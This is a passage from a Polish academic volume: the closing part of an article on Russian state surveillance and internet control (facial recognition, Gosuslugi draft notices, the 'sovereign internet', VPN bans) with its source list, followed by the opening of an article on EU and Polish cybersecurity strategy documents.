kamery do rozpoznawania twarzy są również planowano zainstalować na granicach Rosji
z Chinami, Kazachstanem, Polską, Litwą i Abchazją. Odpowiedni przetarg na 830
milionów rubli został umieszczony na portalu zamówień publicznych w lutym 2023 roku.
Innym systemem wdrożonym w Rosji w 2021 i podłączonym do kamer
monitoringu było rozpoznawanie osób i pojazdów po sylwetkach
82
. W 2022 r. Moskwa
zajęła 7. miejsce w światowym rankingu miast z najbardziej rozbudowanym systemem
nadzoru wideo. Według oficjalnych danych władz stolicy, w mieście zainstalowanych jest
ponad 221 tysięcy kamer monitoringu. Tak więc na tysiąc mieszkańców Moskwy
przypada średnio ponad 16 kamer - w tym indeksie wyżej znajduje się tylko kilka miast
w Chinach i Indiach. Podobne systemu działają także w innych dużych miastach. Według
danych na 2023 roku w ponad 60 regionach Rosji wdrożono pochodzące z Ntechlab
systemu rozpoznawania twarzy
83
. W kolejnych latach kamer na rosyjskich ulicach ma być
zdecydowanie więcej i do tego powinny być połączone w centralną sieć śledząco-
analityczną
84
.
80
https://www.currenttime.tv/a/kyrgyzstan-sistema-raspoznavaniya-lits/32457103.html
81
https://poligonmedia.io/na-graniczah-ustanovyat-sistemu-raspoznavaniya-licz-za-830-mln-rublej/
82
https://newsarmenia.am/news/in_the_world/v-rossii-zapustili-sistemu-raspoznavaniya-lits-i-siluetov-
lyudey-i-mashin/
83
https://roskomsvoboda.org/post/syst-raspozn-62-region/
84
https://roskomsvoboda.org/post/mincif-edin-platform-video/
89
Rys. 10. Informacja o planowanym przetargu na system rozpoznawania twarzy zainstalowany
między innymi na granicy z Polską.
Źródło https://poligonmedia.io/na-graniczah-ustanovyat-sistemu-raspoznavaniya-licz-za-830-mln-
rublej/
Ciekawym przykładem wykorzystania kamer jest śledztwo w sprawie
zamachu na Darię Duginę, która zginęła w lipcu 2022 roku. Miejsce, w którym podłożono
ładunek wybuchowy pod jej samochód – ogólnodostępny parking na przedmieściach
Moskwy akurat w czasie zamachu nie było monitorowane. Prowadząca śledztwo FSB
dość szybko wskazała potencjalną podejrzaną obywatelkę Ukrainy Natalię Wowk
85
. Jako
dowód zaprezentowano krótki filmik z aktywności podejrzanej w rejonie, gdzie
mieszkała ofiara
86
. Na filmie widzimy kadry nagrane automatycznie przez kamery
domofonu oraz zdjęcia z systemów rozpoznawania pojazdów na ulicach Moskwy.
Szczególne wrażenie robią, dane monitoringowe z domofonu, ale już 2016 roku w
Moskwie takie systemy funkcjonowały. Niestety z filmu niewiele dowiemy się na temat
analityki zastosowanej przy wyszukiwaniu nagrań. Zaskakuje jedynie czas na potrzebny
FSB na znalezienie właściwych nagrań.
85
https://www.rp.pl/swiat/art36911671-fsb-oskarza-ukrainskie-sluzby-o-zabicie-corki-dugina
86
https://www.youtube.com/watch?v=mxnPrZyBjdQ i https://meduza.io/amp/news/2022/08/22/fsb-pokazala-
video-s-podozrevaemoy-v-ubiystve-dari-duginoy
90
Rys. 11. Kadry z filmu przygotowanego przez FSB RF i opublikowanego w rosyjskich mediach.
Czarnobiała fotografia to zapis z rejestratora domofonu a zdjęcie poniżej jest fotografią systemu
nadzoru ruchu, przy czym fotografia nie ma związku z naruszeniem zasad ruchu drogowego.
Źródło: https://meduza.io/amp/news/2022/08/22/fsb-pokazala-video-s-podozrevaemoy-v-
ubiystve-dari-duginoy
Usługi cyfrowe i suwerenny Internet
Historia jednolitego systemu umożliwiającego załatwianie w Internecie
spraw urzędowych jest w Rosji dosyć długa, wszystko zaczęło jeszcze w 2011 roku
87
. Z
czasem portal wyewoluował w obecna formę, nosząca oficjalną nazwę „Gosusługi”
88
. Za
pośrednictwem systemu można nie tylko kontaktować się z urzędami czy zarejestrować
do lekarza, ale także ubezpieczyć samochód czy wreszcie podpisać kontrakt z wojskiem.
W listopadzie 2019 r. w systemie e-administracji „Gosusługi” zarejestrowanych było 100
mln osób
89
. „Gosuługi” należą do pakietu stron internetowych obok „Vkontakte” i
„Mail.ru” do których dostęp Rosjanie mają za darmo. W praktyce oznacza to dostęp ze
smartfonu przy użyciu dowolnego planu taryfowego.
87
https://web.archive.org/web/20120406195328/http://www.gosuslugi.ru/pgu/content/120/290/309
88
https://www.gosuslugi.ru/ co ciekawe strona jest dostępna z terenu Polski
89
https://www.osw.waw.pl/pl/publikacje/komentarze-osw/2019-12-04/zakneblowac-runet-uciszyc-
spoleczenstwo-kremlowskie-ambicje
91
Rys. 12. Strona tytułowa systemu „Gosusługi” .
Źródło https://www.gosuslugi.ru/
Podobne systemy e-administracji wdrażane są w wielu krajach i zwykle
nie budzą kontrowersji. Jednakże w czasie nieudanej jesiennej fali mobilizacji władze
rosyjskie postanowiły wykorzystać system do przyspieszenia werbunku obywateli do
wojska
90
. W kwietniu 2023 roku wprowadzono nowe przepisy powodujące zmianę
systemu doręczania wezwań z papierowych na elektroniczne. Dotychczas wezwanie
nieodebrane nie mogło być uznane za doręczone. W nowym modelu wysłanie wezwania
na osobistą skrzynkę w systemie „Gosusługi” uważano za doręczone i wymagano
stawiennictwa w jednostce. Nawet w sytuacji, gdy osoba nie miała konta w systemie lub
obawiając się wezwania po prostu je usunęła. Uchylającemu się od służby wojskowej
uniemożliwiono kupno samochodu, zarejestrowanie działalności gospodarczej i wyjazd
za granicę. Wprowadzona w tym samym momencie usługa jednego konta do wielu
systemów sugerowała, że „Gosusługi” wymieniają się danymi z innymi systemami. A to
oznacza, że uciekając od powołania do wojska nie tylko należy wyłączyć telefon
komórkowy, unikać kamer, nie korzystać z sieci społecznościowych, ale także nie można
kupić biletu kolejowego, podjąć pracy czy korzystać z poczty. Nie ma dowodów na takie
działanie systemu, ale dotychczasowe i planowane projekty mogą sugerować takie plany.
90
https://studium.uw.edu.pl/parlament-zalegalizowal-elektroniczne-wezwania-do-wojska/
92
Rys. 13. „Gosusługi” jako integrator dostępu do usług i systemów państwowych.
Źródło: https://www.gosuslugi.ru/
W 2019 roku w Rosji pojawiła się jeszcze jedna idea panowania nad
Internetem, mianowicie projekt tzw. „suwerennego internetu”. Ustawa, która weszła w
życie 1.11.2019 przewiduje, przebudowanie struktury sieci w taki sposób, aby rosyjska
komunikacja internetowa dla „dobra bezpieczeństwa cybernetycznego przebiegała przez
węzłowe punkty we własnym kraju”. Jak wyjaśniano, będzie w ten sposób
zagwarantowane, że rosyjski Internet będzie funkcjonował nawet wtedy, kiedy lokalni
operatorzy nie będą mogli uzyskać połączenia z zagranicznymi serwerami. W złożeniach
rosyjscy oferenci usług internetowych zostali zobowiązani do zapewnienia, że są w stanie
centralnie kontrolować komunikację wewnątrz swoich sieci. Tą drogą rzekomo będzie
można identyfikować i zwalczać potencjalne zagrożenia. Za kontrolę będzie w
pierwszym rzędzie odpowiedzialny urząd nadzoru telekomunikacji i mediów
(Roskomnadzor) i oczywiście FSB
91
. Pierwsze testy rozwiązań przeprowadzono w
grudniu 2019 roku. Od tamtego czasu trwają prace i kolejne testy różnych rozwiązań
92
.
Ostatnie miały miejsce w czerwcu 2023 roku w Petersburgu. Zgodnie z komunikatem
efekty były bardzo zadowalające i w przeciwieństwie do wcześniejszych testów siec
pracowała bez problemów
93
. Kolejny test przeprowadzony 05 lipca 2023 roku nie był
już tak bezproblemowy. Według raportu opublikowanego przez Institute for the Study of
War (ISW – Instytut Studiów nad Wojną), test ten uniemożliwił Rosjanom dostęp
do zachodnich usług, takich jak Google i Wikipedia, jednocześnie utrzymując dostęp
do serwisów hostowanych w Rosji. Prawdopodobnie spowodował również zakłócenia
w dostępie do niektórych rosyjskich instytucji rządowych, w tym w Rosyjskich Kolei
Państwowych oraz Federalnej Służby Nadzoru Weterynaryjnego i Fitosanitarnego
91
https://www.dw.com/pl/rosja-tworzy-w%C5%82asny-suwerenny-internet/a-51082509
92
Chronologia prac nad „suwerennym internetem” :
https://www.tadviser.ru/index.php/Статья:Автономный_суверенный_интернет_в_России
93
https://neva.today/news/2023/7/6/445498
93
(Rosselkhoznadzor). Awarie zgłaszali również operatorzy telekomunikacyjni Megafon
i Beeline
94
. Rosyjskie rozwiązania odcinające Internet od zagranicy są wzorowane na
mechanizmach funkcjonujących w Iranie i Chinach. Oba kraje budowały swoja
infrastrukturę internetowa w zupełnie innych warunkach – Iran jest krajem izolowanym,
z niewielkimi przerwami od ponad 40 lat, Chiny zaś od początku miały strategię
wewnętrznego Internetu ze ściśle limitowanymi połączeniami ze światem zewnętrznym
95
.
Podobnie jak w obu krajach Rosjanie chcą zabezpieczyć funkcjonowanie wewnętrznych
systemów np. administracyjnych, które przynajmniej od momentu inwazji na Ukrainę
poddawane są stałym atakom hackerskim oraz lepiej kontrolować społeczeństwo i
zapewnić sobie przewagę informacyjną. Rola propagandy dla rosyjskich władz zawsze
była bardzo ważna. Większość blokad w Internecie ma na celu odcięcie mieszkańców
kraju od niezależnej informacji. Podporządkowanie sieci społecznościowych (VK) i
blokada zachodnich (Facebook i Twitter /X) mają na celu kontrolę. Rosjanom w
komunikacji z urzędami nie wolno używać zachodnich adresów e-mail, zmuszeni są do
wykorzystania kontrolowanej przez państwo rosyjskiej sieci.
Podobnie jak w krajach zachodnich telewizja powoli traci na
popularności. Szczególnie młodsza część społeczeństwa wiedzę o świecie czerpie z
komunikatora „Telegram”, który państwo przestało blokować i traktuje zarówno jako
zagrożenie, ale też i szanse na rozpowszechnianie propagandy swoich poglądów.
Ogromna popularnością cieszą się kanały na Youtube. Rosyjscy blogerzy mają tam
ogromne zasięgi i sądząc po informacjach potrafią zarabiać na tej popularności mimo
odłączonej tzw. monetyzacji. Serwis „Youtube” już na początku inwazji rozpoczął
blokowanie rosyjskich mediów państwowych
96
i proces ten trwa. Z tego też powodu co
jakiś czas pojawiają się doniesienia o rychłym zamknięciu dostępu do serwisu a Rosjanie
próbują (z niewielkim jak na razie skutkiem) uruchomić swoje serwisy takie jak należący
do Gazpromu „Rutube
97
” i „Dzen
98
” będący częścia Yandexu.
Ostatnim pomysłem bezpiecznego i suwerennego internetu jest
rozwiązanie żywcem przeniesione z Chin i częściowo stosowane na Białorusi mianowicie
dostęp do stron tylko po uprzedniej rejestracji za pośrednictwem dokumentów. Tak
reglamentowany internet miałby być bezpieczny zarówno od strony potencjalnych
oszustw (które mimo kontroli są w Rosji plagą) jak i oczywiście w sferze treści
99
.
Podsumowanie
Artykuł pierwotnie miał być tekstową wersją prezentacji wygłoszonej w
czerwcu 2023 roku. Jednak zmiany, w ogromnej mierze negatywne, które nastąpiły w
drugim półroczu 2023 roku znacznie zmieniły konteksty prezentacji. Stało się jasne, że
mimo bezprecedensowej inwigilacji obywateli władze chcą dodatkowej kontroli.
Oczywiście wszystko to w imię bezpieczeństwa państwa i samych obywateli. Z
zapowiedzi nowych metod kontroli, które mają zostać wprowadzone w 2024 roku na
94
https://itbiznes.pl/bezpieczenstwo/rosja-suwerenny-internet-test/
95
https://www.bbc.com/russian/features-47217127
96
https://www.wsj.com/livecoverage/russia-ukraine-latest-news-2022-03-01/card/youtube-blocks-russian-
state-controlled-channels-in-the-europe-0FUtyPt4wj1f89zDIEoF
97
https://rutube.ru/
98
https://dzen.ru/
99
https://3dnews.ru/1088486/do-kontsa-goda-v-rossii-nachnut-testirovat-suverenniy-internet-s-bezopasnimi-
servisami-i-vhodom-po-personalnomu-identifikatoru
94
pierwszy plan wybija się zakaz reklamowania i informowania o serwisach VPN. Przepis
ten w zasadzie delegalizujący serwisy VPN w Rosji wchodzi w życie od 01 marca 2024
roku. Kolejnym zapowiedzianym działaniem jest kontrola tzw. blogerów czyli osób i
podmiotów publikujących treści głownie w zablokowanym w Rosji „Youtube”.
Szczególne regulacje mają dotyczyć osób i organizacji ze statusem „agenta zagranicy”.
Takie podmioty nie będą mogły przyjmować reklam z Rosji. Dla wielu niezależnych
redakcji będzie to oznaczało duże problemy finansowe, ponieważ podmioty rosyjskie nie
mają możliwości monetyzowania treści umieszczanych na zachodnich platformach.
Trzecim już zapowiedzianym kierunkiem działań jest aktywne blokowanie kanałów
Telegramu. Na początku lutego 2024 roku rosyjskie MSW oficjalnie uznało komunikator
jako „poważne źródło zagrożeń informatycznych” i zamierza doprowadzić do m.in.
konieczności rejestracji anonimowych kanałów.
W artykule opisano tylko część, wybranych narzędzi i metod, które są lub
będą stosowane na poziomie federalnym. Do nich dochodzą często inicjatywy lokalne i
narzędzia np. miejskie stosowane w dużych miastach. Nie ma chyba dzisiaj raportu ani
organizacji, która potrafiłaby pokazać sytuację naprawdę całościowo. Może się więc
okazać, że jest znacznie gorzej niż myślimy. Tak czy inaczej temat kontroli Runetu w
żaden sposób nie został wyczerpany.
Źródła
1. http://publication.pravo.gov.ru/Document/View/0001201804190032?rangeSize
=1&index=1
2. https://3dnews.ru/1088486/do-kontsa-goda-v-rossii-nachnut-testirovat-
suverenniy-internet-s-bezopasnimi-servisami-i-vhodom-po-personalnomu-
identifikatoru
3. https://blocklist.rkn.gov.ru
4. https://blog.group-ib.ru/qr
5. https://censortracker.org/
6. https://cybernews.com/news/apple-meduza-podcast-russia/
7. https://ddosecrets.com/wiki/Category:Russia
8. https://docs.google.com/document/d/1X3MV7rPQp8IIdPKclGj_8O0WI1wK9
_ET_FlOpw9oeT4/mobilebasic
9. https://dzen.ru/
10. https://eais.rkn.gov.ru
11. https://eais.rkn.gov.ru
12. https://forum.nag.ru/index.php?/topic/88815-i-esli-est-te-kto-prihodyat-k-
tebe/page/6/
13. https://freedomhouse.org/country/russia/freedom-net/2023
14. https://itbiznes.pl/bezpieczenstwo/rosja-suwerenny-internet-test/
15. https://iz.ru/1370015/valerii-kodachigov/grafik-robota-feiki-v-seti-po-zaprosu-
vlastei-naidet-algoritm
16. https://meduza.io/en/feature/2023/02/10/a-wild-boar-trained-by-yandex
17. https://meduza.io/en/feature/2023/02/10/a-wild-boar-trained-by-yandex
18. https://meduza.io/feature/2020/04/14/vydacha-tsifrovyh-propuskov-na-
peredvizhenie-po-moskve-i-oblasti-obernulas-haosom
19. https://meduza.io/feature/2020/04/18/v-moskve-vvedut-avtomaticheskuyu-
sistemu-kontrolya-propuskov-ogranicheniya-na-rabotu-predpriyatiy-prodleny-
do-1-maya
95
20. https://meduza.io/feature/2020/04/27/po-vsey-rossii-vvodyat-sistemy-
tsifrovyh-propuskov-my-proverili-nekotorye-iz-nih-vmeste-s-ekspertami-po-
bezopasnosti-i-vot-chto-poluchilos
21. https://meduza.io/feature/2022/04/13/meduza-vyyasnila-chto-roskomnazdor-
esche-v-2020-godu-sozdal-sistemu-dlya-otslezhivaniya-antivoennyh-
materialov-v-internete
22. https://meduza.io/video/2020/04/10/sobyanin-ob-yavil-o-vvedenii-
propusknogo-rezhima-v-moskve
23. https://neobit.ru/about#partners
24. https://neva.today/news/2023/7/6/445498
25. https://newsarmenia.am/news/in_the_world/v-rossii-zapustili-sistemu-
raspoznavaniya-lits-i-siluetov-lyudey-i-mashin/
26. https://ntechlab.ru
27. https://ooni.org/post/2023-russia-a-year-after-the-conflict/
28. https://openrunet.org/
29. https://poligonmedia.io/na-graniczah-ustanovyat-sistemu-raspoznavaniya-licz-
za-830-mln-rublej/
30. https://reestr.rublacklist.net/ru/
31. https://reestr.rublacklist.net/ru/statistics/
32. https://rg.ru/2023/02/20/roskomnadzor-razrabatyvaet-vepria-dlia-rabotaet-nad-
sistemoj-obezvrezhivaniia-infobomb-v-internete.html
33. https://rkn.gov.ru
34. https://roskomsvoboda.org/8827/
35. https://roskomsvoboda.org/post/grchts-dorabotka-systemy/
36. https://roskomsvoboda.org/post/grchts-dorabotka-systemy/
37. https://roskomsvoboda.org/post/mincif-edin-platform-video/
38. https://roskomsvoboda.org/post/nov-poln-rkn-block-vpn/
39. https://roskomsvoboda.org/post/syst-raspozn-62-region/
40. https://ru.wikipedia.org/wiki/Рунет
41. https://rus.postimees.ee/
42. https://rutube.ru/
43. https://securityaffairs.co/27611/digital-id/new-powers-sorm-2.html
44. https://snob.ru/entry/191534/
45. https://spectr-forum.com
46. https://static.istories.media/uploaded/documents/6f14a0f5e6474b81bb55585f3
055ee20.pdf
47. https://studium.uw.edu.pl/parlament-zalegalizowal-elektroniczne-wezwania-
do-wojska/
48. https://support.meduza.io/en#support
49. https://t.me/cpartisans/960
50. https://t.me/Telecomreview/11102
51. https://t.me/vkfindface_bot
52. https://tass.ru/ekonomika/5129977
53. https://tvn24.pl/swiat/amerykanie-maja-prism-a-rosjanie-sorm-i-pak-tak-
podsluchuja-w-panstwie-putina-ra369335-3451402
54. https://unece.org/fileadmin/DAM/hlm/prgm/urbandevt/Measuring_Progress__
Achieving_Smarter_Cities_/Presentations/Sedov.pdf
55. https://urbanplanet.info/wp-content/uploads/2014/01/Moscow-City-for-life-
96
ru.pdf
56. https://web.archive.org/web/20120406195328/http://www.gosuslugi.ru/pgu/con
tent/120/290/309
57. https://www.bbc.com/news/technology-63218095
58. https://www.bbc.com/russian
59. https://www.bbc.com/russian/features-47217127
60. https://www.bbc.com/russian/features-63346138
61. https://www.biometricupdate.com/202301/moscow-metro-to-expand-face-pay-
biometric-service-as-customer-base-grows
62. https://www.bleepingcomputer.com/news/government/russia-bans-18-million-
amazon-and-google-ips-in-attempt-to-block-telegram/
63. https://www.comnews.ru/content/225501/2023-04-17/2023-w16/youtubom-
edinym-rossiya-ne-zablokiruet-globalnyy-videokhosting
64. https://www.comnews.ru/content/229710/2023-10-25/2023-w43/1009/fsb-
nedovolny-tempami-ispolneniya-trebovaniy-paketa-yarovoy-operatorami-
svyazi
65. https://www.comnews.ru/content/86698
66. https://www.currenttime.tv/a/kyrgyzstan-sistema-raspoznavaniya-
lits/32457103.html
67. https://www.currenttime.tv/a/russia-leak-internet-censorship/32262160.html
68. https://www.currenttime.tv/a/russia-leak-internet-censorship/32262160.html
69. https://www.dataguidance.com/news/russia-roskomnadzor-publishes-note-
blocking-vpn
70. https://www.dw.com/pl/rosja-tworzy-w%C5%82asny-suwerenny-internet/a-
51082509
71. https://www.garant.ru/news/782190/
72. https://www.gosuslugi.ru/ co ciekawe strona jest dostępna z terenu Polski
73. https://www.hrw.org/news/2020/03/25/moscow-silently-expands-surveillance-
citizens
74. https://www.hrw.org/ru/news/2022/10/28/russia-uses-facial-recognition-hunt-
down-draft-evaders
75. https://www.intelligenceonline.com/corporate-intelligence/2021/06/18/huawei-
hired-top-researchers-from-russia-s-us-sanctioned-neobit,109674074-eve
76. https://www.intellinews.com/russia-develops-a-major-face-recognition-
scheme-162959/
77. https://www.interfax-russia.ru/main/roskomnadzor-bolee-172-tys-feykov-ob-
svo-zablokirovano-v-runete
78. https://www.kommersant.ru/doc/2324684
79. https://www.komputerswiat.pl/aktualnosci/aplikacje/koniec-z-ukrywaniem-sie-
w-sieci-findface-odnajdzie-kazdego/mhdzhr0
80. https://www.mk.ru/social/2013/05/24/859081-quotvkontaktequot-vnesen-v-
spisok-zapreschennyih-saytov.html
81. https://www.newsru.com/hitech/26apr2018/durov.html
82. https://www.osw.waw.pl/pl/publikacje/komentarze-osw/2019-12-
04/zakneblowac-runet-uciszyc-spoleczenstwo-kremlowskie-ambicje
83. https://www.rans.ru/association/wrkn-grps/46-46
84. https://www.reuters.com/technology/russia-plans-try-block-vpn-services-2024-
senator-2023-10-03/
97
85. https://www.rferl.org/a/russian-opposition-likes-facebook/24585388.html
86. https://www.rp.pl/swiat/art36911671-fsb-oskarza-ukrainskie-sluzby-o-zabicie-
corki-dugina
87. https://www.tadviser.ru/index.php/Статья:Автономный_суверенный_интерн
ет_в_России
88. https://www.theguardian.com/world/2021/oct/15/privacy-fears-moscow-metro-
rolls-out-facial-recognition-pay-system
89. https://www.wsj.com/livecoverage/russia-ukraine-latest-news-2022-03-
01/card/youtube-blocks-russian-state-controlled-channels-in-the-europe-
0FUtyPt4wj1f89zDIEoF
90. https://www.youtube.com/watch?v=mxnPrZyBjdQ i
https://meduza.io/amp/news/2022/08/22/fsb-pokazala-video-s-podozrevaemoy-
v-ubiystve-dari-duginoy
98
KRAJOWE I MIĘDZYNARODOWE DOKUMENTY STRATEGICZNE W
ZAKRESIE CYBERBEZPIECZEŃSTWA – WYBRANE PROBLEMY
NATIONAL AND INTERNATIONAL STRATEGIC DOCUMENTS ON CYBER
SECURITY - SELECTED ISSUES
dr Jacek CHARATYNOWICZ
1
Akademia Nauk Stosowanych WSGE im. Alcide De Gasperi w Józefowie
Streszczenie Każda organizacja, w tym państwo, musi identyfikować pojawiające się
zagrożenia w różnych obszarach i wymiarach swojej aktywności, istotnych dla jego
bezpieczeństwa oraz podejmować adekwatne działania, celem im skutecznego
przeciwdziałania. W przypadku zaplanowanych działań o charakterze strategicznym,
muszą one uwzględniać takie kwestie jak: zasoby materialne, osobowe i finansowe
organizacji, otoczenie zewnętrze, zmienność oraz nieprzewidywalność środowiska
bezpieczeństwa oraz zakładane do osiągnięcia cele. Strategia cyberbezpieczeństwa -
dotycząca nowej przestrzeni bezpieczeństwa, z uwagi na różne obszary, których dotyka,
wymaga komplementarnego podejścia służb, instytucji oraz sektora prywatnego. Tylko
taki sposób projektowania działań w zakresie przeciwdziałania i mitygacji zagrożeń
występujących w cyberprzestrzeni może gwarantować skuteczność i efektywność
realizowanych zadań
Słowa kluczowe: strategia cyberbezpieczeństwa, cyberprzestrzeń, państwo, kultura
strategiczna
Summary
Every organization, including the state, must identify emerging threats in various areas
and dimensions of its activity, that are relevant to its security, in order to take adequate
measures to counter them effectively. In the case of planned activities of a strategic nature,
they must take into account such issues as material, HR and financial resources of the
organization, the external environment, the variability and unpredictability of the security
environment as well as goals to be achieved. Cyber security strategy - concerning the new
security space, due to the different areas it covers, requires a complementary approach of
security forces, institutions and the private sector. Only such a way of designing activities
for countering and mitigating threats occurring in cyberspace can guarantee the
effectiveness and efficiency of the tasks carried out
Keywords: cybersecurity strategy, cyberspace, state, strategic culture
1
j.charatynowicz@gmail.com, ORCID: 0000-0003-0484-4078.
99
WSTĘP
Zagrożenia występujące w cyberprzestrzeni, w różnych jej aspektach – finansowym,
społecznym, kulturowym, informacyjnym, infrastruktury krytycznej czy o charakterze
militarnym (kinetycznym) należą do najpoważniejszych współczesnych ryzyk w zakresie
bezpieczeństwa. Czynnikami je kształtującymi są m. in. rozwój technologiczny, brak
adekwatnych kompetencji cyfrowych uczestników tej rzeczywistości, anonimowe
uczestnictwo w społeczeństwie sieci, transgraniczny charakter, brak krytycznego
spojrzenia na informacje czy też obiektywne trudności w ich rozpoznawaniu i mitygacji.
Różnego rodzaju organizacje, w tym państwo musi reagować na identyfikowane
zagrożenia poprzez przemyślane działania zapobiegawcze, naprawcze, czy w zakresie
usuwania ich skutków. Z uwagi na zakres realizacji mogą mieć one wymiar prawny,
organizacyjny, operacyjny czy też represyjny. Natomiast z uwagi na stopień i czas
oddziaływania przez organizację mogą mieć charakter działań doraźnych, w celu
przeciwdziałania ustalonym podatnościom, czy też skupiać się również na kilku,
wybranych obszarach. Mogą mieć one również wymiar strategii – czyli świadomie
skonstruowanego długofalowego planu działań, uwzględniającego posiadane zasoby
materialne, osobowe i finansowe, różne aspekty działania (prawne, organizacyjne czy
operacyjne), skonstruowane w pewnej perspektywie czasu oraz mające na celu,
uwzględniając otoczenie zewnętrzne, realizację ściśle określonych zadań organizacji.
Podstawę do napisania przedmiotowego artykułu były metody teoretyczne, w
szczególności takie jak: analiza literatury, aktów prawnych, dokumentów strategicznych
z obszaru cyberbezpieczeństwa, jak również uogólnienie i synteza zebranych wniosków.
Przedmiotem niniejszego artykułu będzie przedstawienie dokumentów
strategicznych w obszarze cyberbezpieczeństwa, zarówno o charakterze krajowym jak i
europejskim, funkcji jaką pełnią w architekturze bezpieczeństwa jak również ocena
stopnia ich komplementarności.
STRATEGIA
W zmiennym, nieprzewidywalnym i złożonym współczesnym środowisku
bezpieczeństwa istotną rolę odgrywają takie procesy jak: rozpoznawanie i badanie
trendów, analiza zasobów własnych organizacji, otoczenia, rozpoznawania szans i
zagrożeń, czy też identyfikowanie tzw. czarnych łabędzi, czyli zdarzeń, procesów, które
na podstawie dostępnej wiedzy nie mogą być właściwie identyfikowane i prognozowane.
Kolejnym etapem decyzyjnym jest budowanie odpowiedniej strategii działania
organizacji. Zgodnie z internetowym słownikiem języka polskiego, strategia to dział
sztuki wojennej obejmujący przygotowanie i prowadzenie wojny oraz poszczególnych jej
kampanii i bitew
2
, wg innej z definicji strategia to teoria i praktyka przygotowania i
prowadzenia wielkich operacji i kampanii wojskowych
3
. Zatem przywołane definicje,
wyjaśnienia wyraźnie wskazują na etymologię terminu wywodzącą się z nauk o
wojskowości. W kontekście bezpieczeństwa - strategia to teoria i praktyka określająca
sposoby myślenia i działania przedstawicieli najwyższych władz w danej dziedzinie,
2
https://sjp.pwn.pl/sjp/strategia;2576315 (dostęp: 26.01.2022).
3
W. Kopaliński, Słownik wyrazów obcych i zwrotów obcojęzycznych z almanachem, Wyd. Muza, Warszawa
2000, s 474.
100
charakteryzujące się wysokim stopniem uogólnienia, dużym, horyzontem czasowym oraz
umiejętnością pozyskiwania zasobów dla osiągnięcia założonych celów
4
.
Termin strategia został zaadoptowany do procesu zarządzania ludźmi,
organizacjami czy państwem – organizacją, która realizuje zadania w kontekście
bezpieczeństwa, w tym publicznego, finansowego, kulturowego, ekologicznego,
społecznego i militarnego. W tym kontekście strategia jest definiowana m. in. jako zbiór
celów oraz głównych przedsięwzięć organizacyjnych
5
.
Warto wskazać na istotne elementy strategii:
1. Analiza działalności organizacji oraz otoczenia środowiska bezpieczeństwa tej
organizacji,
2. Identyfikacja zagrożeń oraz propozycje ich mitygacji,
3. Uwzględnienie zmienności i nieprzewidywalności współczesnego środowiska
bezpieczeństwa,
4. Charakterystyka organizacji wspierających oraz współdziałających w zakresie
identyfikowania zagrożeń oraz budowania systemów ochrony organizacji,
celem przeciwdziałania potencjalnym zagrożeniom,
5. Planowane zmiany w organizacji,
6. Posiadane własne zasoby ludzkie, materialne, finansowe, operacyjne i
kooperacyjne,
7. Wskazanie przedziału czasowego obowiązywania strategii,
8. Audyt i ewaluacja procesu strategii,
9. Sprecyzowane cele i efekty zakładanych działań.
W naukach o bezpieczeństwie, biorąc pod uwagę strukturę dokumentów strategicznych z
zakresu bezpieczeństwa, procedury oraz modelu ich opracowywania, ich
komplementarności, istotności oraz weryfikowalnego charakteru, jak również obszaru,
którego dotyczy dana koncepcja, można mówić o terminie kultury strategicznej. W
literaturze przedmiotu rozumie się przez to system wartości, przekonań, symboli i
zwyczajów historycznie ukształtowanych, wpływających na stosunek społeczeństwa do
zapewnienie bezpieczeństwa narodowego państwa
6
.
STRATEGIA BEZPIECZEŃSTWA UE
W Strategii Bezpieczeństwa Unii Europejskiej na lata 2020 – 2025
zidentyfikowano cztery obszary strategiczne, istotne z punktu widzenia bezpieczeństwa
UE, jej suwerenności cyfrowej, integralności, innowacyjności czy atrakcyjności
inwestycyjnej. Przy jej formułowaniu wzięto pod uwagę zarówno doświadczenia
związane z rozwojem cyfrowym, który uwarunkowany jest również zagrożeniami o
charakterze ekonomicznym, społecznym, kulturowym czy informacyjnym. Rozwojem
sztucznej inteligencji, technologii kwantowej, które mogą być szansą dla rozwoju
gospodarki UE oraz czynić ją bardziej konkurencyjną, jak również trendami
demograficznymi, ekologicznymi, czy też konfliktami rozgrywającymi się w otoczeniu
UE. W przedmiotowym dokumencie wskazuje się na konieczność podjęcia przez Państwa
Członkowskie priorytetowych działań w obszarze bezpieczeństwa, wśród nich są to:
4
Akademia Obrony Narodowej, Wydział Strategiczno-Obronny, Słownik terminów z zakresu bezpieczeństwa
narodowego, Wydanie Szóste Warszawa 2008.
5
Pod. red. A. Koźmiński, W. Piotrowski, Zarządzanie. Teoria i praktyka, Wydawnictwo Naukowe PWN,
Warszawa 2005. s. 132 – A.D. Chandler, Strategy and Structure, MIT Press, Cambridge, 1962.
6
Op. cit. Słownik terminów z zakresu bezpieczeństwa narodowego.
101
1. środowisko bezpieczeństwa w przyszłości,
2. zwalczanie ewoluujących zagrożeń,
3. ochrona przed terroryzmem i przestępczością zorganizowaną,
4. silny europejski ekosystem bezpieczeństwa.
Wskazane w strategii obszary są wyrazem zagrożeń i wyzwań stojących przed
państwami członkowskimi UE przede wszystkim w obszarze świata cyfrowego,
infrastruktury krytycznej oraz związanych z agresją FR na Ukrainę. Ponadto, wskazują
na identyfikowane szanse związane z rozwojem cyfrowym w kontekście rozwoju
gospodarki, wspólnego rynku, czy też rynków alternowanych – kryptoaktywów. Takie
zamierzenie ma uczynić rynek europejski bardziej konkurencyjnym, innowacyjnym oraz
przekładać się na nowe miejsce pracy, inwestycje i dochody budżetowe.
16 grudnia 2020 r. przyjęto Strategię UE w zakresie cyberbezpieczeństwa na
cyfrową dekadę
7
, której celem była ochrona globalnego i otwartego Internetu z
jednoczesnym zachowaniem gwarancji nie tylko odnośnie bezpieczeństwa, ale także do
ochrony europejskich wartości i praw podstawowych obywateli. W ramach
przedmiotowej strategii zakładano wykorzystanie trzech płaszczyzn aktywności: o
charakterze regulacyjnym, inwestycyjnym oraz politycznym.
Wyrazem zaprezentowanych założeń jest aktywność UE przede wszystkim w
płaszczyźnie regulacyjnej – uchwalenie nowych aktów prawnych związanych z walutami
cyfrowymi, czy dyrektyw w zakresie krajowych systemów cyberbezpieczeństwa oraz
odporności cyfrowej sektora finansowego. Aktualnie oczekują dyskusji i uchwalenia akty
prawne w zakresie sztucznej inteligencji.
Przedstawiona strategia zawiera zidentyfikowane szanse związane z rozwojem
obszarów komunikacyjnych, kulturowych, handlowych, energetycznych, czy też
przestrzeni kosmicznej oraz obronności. Sfery te są w coraz większym stopniu powiązane
operacyjnie, sieciowo, w związku tym skutki związane z cyberatakami, czy też innymi
zagrożeniami są szczególnie istotne i mają wpływ na gospodarkę, rynki finansowe, ale
również inne aktywności człowieka. Szanse związane z cyberprzestrzenią, wsparte
